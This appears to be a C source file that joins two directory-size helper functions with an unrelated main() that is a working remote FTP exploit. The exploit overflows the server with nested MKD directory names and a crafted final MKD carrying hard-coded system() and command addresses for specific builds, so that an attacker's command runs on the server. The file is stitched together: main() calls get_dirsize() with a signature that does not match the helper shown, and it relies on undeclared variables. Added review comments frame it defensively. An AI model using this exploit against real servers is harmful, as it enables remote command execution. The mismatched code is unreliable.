/**
 * Recursively add up the sizes of the regular files below a directory.
 *
 * @param pPath  directory to walk
 * @return total of st_size over all regular files found; 0 when pPath
 *         cannot be opened. Entries that fail lstat() and entries that are
 *         neither directories nor regular files contribute nothing.
 *
 * Security notes for reviewers:
 *  - Entries are classified with lstat(), so a symbolic link is never
 *    counted as a directory or a file at classification time.
 *  - The recursive call re-opens the same path with opendir(), which does
 *    follow links. If the tree is writable by a less trusted user, an entry
 *    swapped between the lstat() and the opendir() would be followed.
 *  - Recursion depth is bounded only by the depth of the tree.
 */
double get_dirsize(const char *pPath)
{
    DIR *dir = opendir(pPath);
    if (!dir) {
        return 0;
    }

    double total = 0;
    struct dirent *entry;

    while ((entry = readdir(dir)) != NULL) {
        if (dot_or_dotdot(entry->d_name)) {
            continue;
        }

        char *full_path = concat_path_file(pPath, entry->d_name);
        struct stat st;

        /* Entries that cannot be stat'ed are skipped silently. */
        if (lstat(full_path, &st) == 0) {
            if (S_ISREG(st.st_mode)) {
                total += st.st_size;
            } else if (S_ISDIR(st.st_mode)) {
                total += get_dirsize(full_path);
            }
        }

        free(full_path);
    }

    closedir(dir);
    return total;
}
/*
 * Command-line FTP client: logs in, changes into a directory, builds a chain
 * of nested directories with long names via MKD/CWD, then sends one final
 * MKD whose argument carries two hard-coded 32-bit addresses and a command
 * string.
 *
 * Arguments as read below: argv[1] host, argv[2] user, argv[3] password,
 * argv[4] directory, argv[5] command, argv[6] target type, optional argv[7]
 * port, optional argv[8] alignment.
 *
 * Defender's view of what this block shows:
 *  - It needs a login the server accepts (it stops on a '5' reply to PASS)
 *    and issues MKD, so it depends on an account with a writable directory.
 *  - On the wire and in FTP logs the session is a run of MKD/CWD pairs whose
 *    names are up to 255 repetitions of one character, followed by an MKD
 *    with a name dominated by 'X' bytes and non-printable bytes.
 *  - The address constants are tied to the specific builds named in the
 *    inline comments; the target server product is not named in this block.
 *
 * NOTE(review): host, user, pass, dir, command, tmp, buff, netbuf, sd, sa,
 * he, c, i, done, todo, doit, dirsize, tipo, port, align, systemaddr and
 * shelladdr are not declared in this block; presumably file-scope objects.
 * Their sizes cannot be confirmed from here.
 */
int main (int argc, char *argv[])
{
    if (argc < 7) {
        usage(argv[0]);
        exit(0);
    }

    /* Unbounded copies: sprintf with "%s" writes the whole argument, so an
     * argument longer than its destination overflows it. */
    sprintf(host, "%s", argv[1]);
    sprintf(user, "%s", argv[2]);
    sprintf(pass, "%s", argv[3]);
    sprintf(dir, "%s", argv[4]);
    sprintf(command, "%s", argv[5]);
    /* atoi reports no errors; non-numeric input yields 0. */
    tipo = atoi (argv[6]);
    printf ( "%d\n\n", tipo);
    if ( argc > 7) port = atoi(argv[7]);
    if ( argc > 8) align = atoi(argv[8]);

    /* Pick one of three hard-coded address pairs, or the SYSADDR/EGGADDR
     * macros (defined outside this block) for any tipo above 2. */
    if (tipo <= 0) {
        /* 2.4(4) libc5 slack 3.4 */
        systemaddr = 0x400441f0;
        shelladdr = 0x80604a0;
    } else if (tipo == 1) {
        /* beta 15 libc5 slack 3.4 */
        systemaddr = 0x400441f0;
        shelladdr = 0x8062510;
    } else if (tipo == 2) {
        /* 2.4(4) libc5 slack 3.3 */
        systemaddr = 0x400441f0;
        shelladdr = 0x805f1e4;
    } else {
        /* CUSTOM ADDRESS */
        systemaddr = SYSADDR;
        shelladdr = EGGADDR;
    }

    /* The socket() result is not checked before use. */
    sd = socket ( AF_INET, SOCK_STREAM, 0);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    he = gethostbyname (host);
    if (!he) {
        /* Name lookup failed: fall back to parsing host as a dotted quad. */
        if ( (sa.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
            printf ( "wrong ip address or unknown hostname\n");
            exit(0);
        }
    } else {
        bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
    }
    if ( connect ( sd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
        printf ( "Cannot connect to remote host: Connection refused\n");
        exit(0);
    }

    /* Server banner. Every read() in this function ignores its return value,
     * and a read that fills netbuf leaves no terminating NUL for the
     * printf("%s") that follows. */
    read ( sd, netbuf, sizeof(netbuf));
    printf ( "%s\n", netbuf);
    bzero ( &netbuf, sizeof(netbuf));

    /* ok. we're connected. */
    /* Each command is assembled in tmp with strcpy/strcat, with no length
     * check against tmp's size. */
    strcpy ( tmp, "USER ");
    strcat (tmp, user);
    strcat ( tmp, "\n");
    write ( sd, tmp, strlen(tmp));
    bzero ( &tmp, sizeof(tmp));
    read ( sd, netbuf, sizeof(netbuf));
    printf ( "%s\n", netbuf);
    bzero ( &netbuf, sizeof(netbuf));

    /* ok. send the pass. */
    strcpy ( tmp, "PASS ");
    strcat (tmp, pass);
    strcat ( tmp, "\n");
    write ( sd, tmp, strlen(tmp));
    bzero ( &tmp, sizeof(tmp));
    read ( sd, netbuf, sizeof(netbuf));
    /* A reply starting with '5' is treated as a rejected login. */
    if ( netbuf[0] == '5') {
        printf ("Login incorrect!\n");
        exit(0);
    }
    printf ( "%s\n", netbuf);
#ifdef DEBUG
    printf ( "Ok, we're on! Press any key to exploit it\n");
    /* gets() cannot bound its input and was removed from the language in C11. */
    gets(netbuf);
#endif
    bzero ( &netbuf, sizeof(netbuf));

    /* ok. let's get to the vulnerable dir */
    strcpy ( tmp, "CWD ");
    strcat (tmp, dir);
    strcat ( tmp, "\n");
    write ( sd, tmp, strlen(tmp));
    bzero ( &tmp, sizeof(tmp));
    read ( sd, netbuf, sizeof(netbuf));
    printf ( "%s\n", netbuf);
    bzero ( &netbuf, sizeof(netbuf));

    /* NOTE(review): this call passes no argument and discards the result,
     * which does not match a get_dirsize(const char *) returning double;
     * the helper meant here is presumably a different, zero-argument one
     * defined outside this block. */
    get_dirsize(); /* gets home dir size */
    /* Number of name bytes to create below; BSIZE and dirsize come from
     * outside this block. */
    todo = BSIZE - dirsize - 60 - 4;

    /* ok, we're on. let's get things working here! */
    /* Create and enter nested directories, at most 255 name bytes each,
     * until todo bytes of names have been created. */
    while(done < todo) {
        if((todo - done) > 255) doit = 255;
        else doit = todo - done;
        /* Directory name: doit repetitions of the current fill character c. */
        for (i = 0; i < doit; i++) buff[i] = c;
        buff[doit] = '\0';
        strcpy ( tmp, "MKD ");
        strcat ( tmp, buff);
        strcat ( tmp, "\n");
        write ( sd, tmp, strlen(tmp));
        read ( sd, netbuf, sizeof(netbuf));
        /* A reply whose second character is '2' is taken as an MKD failure;
         * the fill character is advanced and the same length is retried.
         * tmp and netbuf are not cleared on this path. */
        if ( netbuf[1] == '2') {
            printf ("error while creating the dir, let's try another name...\n\n");
            c++;
            continue;
        }
        else done += doit;
        bzero ( &tmp, sizeof(tmp));
        bzero ( &netbuf, sizeof(netbuf));
        strcpy ( tmp, "CWD ");
        strcat ( tmp, buff);
        strcat ( tmp, "\n");
        write ( sd, tmp, strlen(tmp));
        read ( sd, netbuf, sizeof(netbuf));
        /* A failed CWD is only reported; the loop carries on regardless. */
        if ( netbuf[0] == '5') {
            printf ("error while exploiting the remote host: Cannot cd dir!\n\n");
        }
        bzero ( &tmp, sizeof(tmp));
        bzero ( &netbuf, sizeof(netbuf));
    }

    /* prepare last one */
    /* Final MKD argument: MAXLEN filler bytes of 'X', overwritten below. */
    memset(buff, 'X', MAXLEN);
    /* systemaddr is written low byte first, repeated every 4 bytes from
     * offset align up to (not including) offset 100. */
    for(i = align; i < 100; i += 4) {
        buff[i ] = systemaddr & 0x000000ff;
        buff[i+1] = (systemaddr & 0x0000ff00) >> 8;
        buff[i+2] = (systemaddr & 0x00ff0000) >> 16;
        buff[i+3] = (systemaddr & 0xff000000) >> 24;
    }
    /* One copy of shelladdr, low byte first, follows the repeated words. */
    buff[i++] = shelladdr & 0x000000ff;
    buff[i++] = (shelladdr & 0x0000ff00) >> 8;
    buff[i++] = (shelladdr & 0x00ff0000) >> 16;
    buff[i++] = (shelladdr & 0xff000000) >> 24;
    /* The command string, with ';' appended, is copied to offset 140 with no
     * check against MAXLEN. */
    strcat(command, ";");
    memcpy(buff+140, command, strlen(command));
    /* Writes index MAXLEN, so buff must hold at least MAXLEN + 1 bytes;
     * its declaration is outside this block. */
    buff[MAXLEN] = '\0';
    strcpy ( tmp, "MKD ");
    strcat ( tmp, buff);
    strcat ( tmp, "\n");
    write ( sd, tmp, strlen(tmp));
    read ( sd, netbuf, sizeof(netbuf));
    bzero ( &tmp, sizeof(tmp));
    bzero ( &netbuf, sizeof(netbuf));

    /* ok. */
    /* The server's reply to the final MKD is read but never inspected, so
     * the messages below are printed whatever the outcome. */
    printf ( "Exploiting %s\n", dir);
    printf ( "Using 0x%x(system) and 0x%x(command), alignment = %d, port = %d\n", systemaddr, shelladdr, align, port);
    printf("\nI guess you're a hax0r now :D.\n");
    close (sd);
}
/**
 * Sum the sizes of everything below a directory and, optionally, report
 * which immediate subdirectory has the largest size-times-age weight.
 *
 * @param pPath      directory to walk
 * @param worst_dir  if non-NULL, *worst_dir is reset to NULL on entry and on
 *                   return holds a heap copy (made with xstrdup) of the name
 *                   of the highest-weighted subdirectory, or NULL if none
 *                   qualified; the caller owns the string
 * @param excluded   if non-NULL, a subdirectory with exactly this name is
 *                   never chosen as worst_dir (it is still counted in the
 *                   total)
 * @return total size of regular files directly in pPath plus get_dirsize()
 *         of each subdirectory; 0 when pPath cannot be opened
 *
 * Weight = (subdirectory size / 1024) * age in minutes since st_mtime, with
 * the age factor applied only when it is positive. A candidate is accepted
 * only if this_is_a_dd() approves it (defined outside this block).
 *
 * Security note for reviewers: entries are classified with lstat(), but the
 * subdirectory is then re-opened by path inside get_dirsize(); in a tree
 * writable by a less trusted user the entry could change in between.
 */
double get_dirsize_find_largest_dir(
        const char *pPath,
        char **worst_dir,
        const char *excluded)
{
    if (worst_dir) {
        *worst_dir = NULL;
    }

    DIR *dir = opendir(pPath);
    if (!dir) {
        return 0;
    }

    time_t now = time(NULL);
    double total = 0;
    double best_weight = 0;
    struct dirent *entry;

    while ((entry = readdir(dir)) != NULL) {
        if (dot_or_dotdot(entry->d_name)) {
            continue;
        }

        char *full_path = concat_path_file(pPath, entry->d_name);
        struct stat st;

        /* Entries that cannot be stat'ed are skipped silently. */
        if (lstat(full_path, &st) == 0) {
            if (S_ISREG(st.st_mode)) {
                total += st.st_size;
            } else if (S_ISDIR(st.st_mode)) {
                double subtree = get_dirsize(full_path);
                total += subtree;

                if (worst_dir
                 && (!excluded || strcmp(excluded, entry->d_name) != 0)
                ) {
                    /* Calculate "weighted" size and age
                     * w = sz_kbytes * age_mins */
                    double weight = subtree / 1024;
                    long age_mins = (now - st.st_mtime) / 60;
                    if (age_mins > 0) {
                        weight *= age_mins;
                    }

                    if (weight > best_weight) {
                        if (this_is_a_dd(full_path)) {
                            best_weight = weight;
                            free(*worst_dir);
                            *worst_dir = xstrdup(entry->d_name);
                        } else {
                            VERB1 log("'%s' isn't a problem directory, probably a stray directory?", full_path);
                        }
                    }
                }
            }
        }

        free(full_path);
    }

    closedir(dir);
    return total;
}